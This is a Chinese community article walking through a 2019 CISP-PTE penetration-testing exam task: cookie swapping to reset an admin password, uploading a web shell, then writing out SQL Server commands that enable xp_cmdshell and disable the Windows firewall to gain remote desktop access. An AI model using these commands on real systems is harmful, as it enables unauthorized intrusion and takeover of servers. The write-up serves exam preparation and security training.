欢迎关注圈子社区微信公众号
作者:圈子社区独立团-孙德胜
责任编辑:Ayn Tony祖
文章虽公开,转载请保留作者和出处,需全文转载请留言
CISP-PTE简介:
中国信息安全测评中心CISP-PTE ——国内首个渗透测试认证#
无任何工作经验以及学历要求#
该注册考试考试内容从多个角度出发,客观题与实操题相结合的形式,来考核考生的能力,通过多个得分点,对考生全面的考核,考生需要了解最新的网络安全技术,跟踪最新的网络安全动态,能够在真实的网络环境中发现问题和解决问题。
PTE考试主要从事信息安全技术领域安全渗透测试工作,是业界首个理论与实践相结合的技能水平注册考试。PTE 考试题型为客观题、实操题,培训与考试80%为手动实践操作。
想考证请持续关注铸剑学院相关开班通告!
(2019年7月考试题)#
考试的时候会有至少六个实操题(占分80分)#
题目页面(考试的时候需要先用namp扫描下题目端口,这里跳过):#
注册一个账号:#
F12:#
替换cookie值:#
总结一下,通过替换cookie修改管理员admin的密码。#
登入后台,上传一句话木马,寻找config配置文件:#
干货来了——通过数据库关闭防火墙,开3389端口和创建管理员账号和密码:#
1.开启xp_cmdshell#
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure
开启3389:#
关闭防火墙:#
exec xp_cmdshell 'netsh firewall set opmode mode=disable'
总结:因为数据库是sa权限,所以可以通过数据库修改。#
不少人考试的时候传马连接,就成功采坑,一天也跳不出来。(考试时间只有四小时)#
远程连接服务器:#
通关key就藏在桌面:#
我是独立团孙德胜,初来乍到,多多包涵!
往期相关推荐
红队公益计划-悬剑武器库-葵花宝典之BurpSuite详解第一章
欢迎关注 圈子社区官方公众号,不花钱,不求人、获得最新实战资源!
公益,鲜活,专业
关于圈子社区:
我们是一个非盈利,封闭的白帽子技术交流社区。目前成员2000+,拥有业内首个自主研发的红蓝实战靶场(公安部已列装),体系化学习和燃爆的交流气氛助你成为真正的大佬,社区专注实战,崇尚技术,如果你也是实战派,请关注我们。
社区地址:(请使用https访问)
https://www.secquan.org
本文始发于微信公众号(Secquan圈子社区):实战派的上岗证-“CISP-PTE”考试实操题解题过程(2019年7月)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论